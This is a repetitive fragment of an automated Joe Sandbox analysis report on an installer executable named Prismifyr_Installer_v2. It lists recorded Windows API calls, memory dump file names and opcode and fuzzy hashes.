                                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00403703,00000006,?,00000006,00000008,0000000A), ref: 004038DB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsyC753.tmp\, xrefs: 004038EF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\
                                                                                                                                                                                                                          • API String ID: 2962429428-1718678454
                                                                                                                                                                                                                          • Opcode ID: 6cd6e50f5f17456ee504dea1d279a22ffa05636b30f87aa31bf8984a95f31d7c
                                                                                                                                                                                                                          • Instruction ID: f79f1cdd038f729e9031bf35a7c7ad7adb8aafebcc14ea038f42f7e62efb972e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cd6e50f5f17456ee504dea1d279a22ffa05636b30f87aa31bf8984a95f31d7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69C0127054070496C1206F759D4F6193E54AB8173BB604776B0B8B10F1C77C4B59595E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403382,004DF000,004DF000,004DF000,004DF000,76233420,004035D9,?,00000006,00000008,0000000A), ref: 00405874
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405882
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                                          • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                                                          • Instruction ID: b5712d1dc6f90c91938fb9970759bfac189bcafefc635788875416fd9ee2894b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FC04C712155019ED7546F619F08B277A50EB60781F158839A946E10E0DB348465ED2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040617E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                          • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00428200,?,00428200,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                          • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                          • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004061B5,?,00000000,?,?,Remove folder: ,?), ref: 0040614B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                          • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040424B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ItemText
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3367045223-0
                                                                                                                                                                                                                          • Opcode ID: fbaad98f197721c3337b4145f660dfcccd1462cc21775b0cc75c291dee439915
                                                                                                                                                                                                                          • Instruction ID: 58c8b0ee816a9f079cb4560b894257bfb9dfa06490f5d5235509ae25e2c95a64
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbaad98f197721c3337b4145f660dfcccd1462cc21775b0cc75c291dee439915
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79C04C76148300BFD681BB55CC42F1FB79DEF94315F44C52EB59CA11E2C63A84309B26
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535814367.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000483000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.000000000054F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535839594.0000000000553000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2536289638.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Prismifyr_Installer_v2.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: df53f0ac968c80b2573d185eedc41732bb4466fa0b660203ffcc6a72f8356a2c
                                                                                                                                                                                                                          • Instruction ID: 539d97cecbd0a6245bb22c05259f77f590d4a0b0d5c0f28d123e3a53dcb21da8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df53f0ac968c80b2573d185eedc41732bb4466fa0b660203ffcc6a72f8356a2c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6C09BB27403007BDE11CB909E49F1777545790740F18447DB348F51E0D6B4D490D61C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2535787698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.2535765193.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
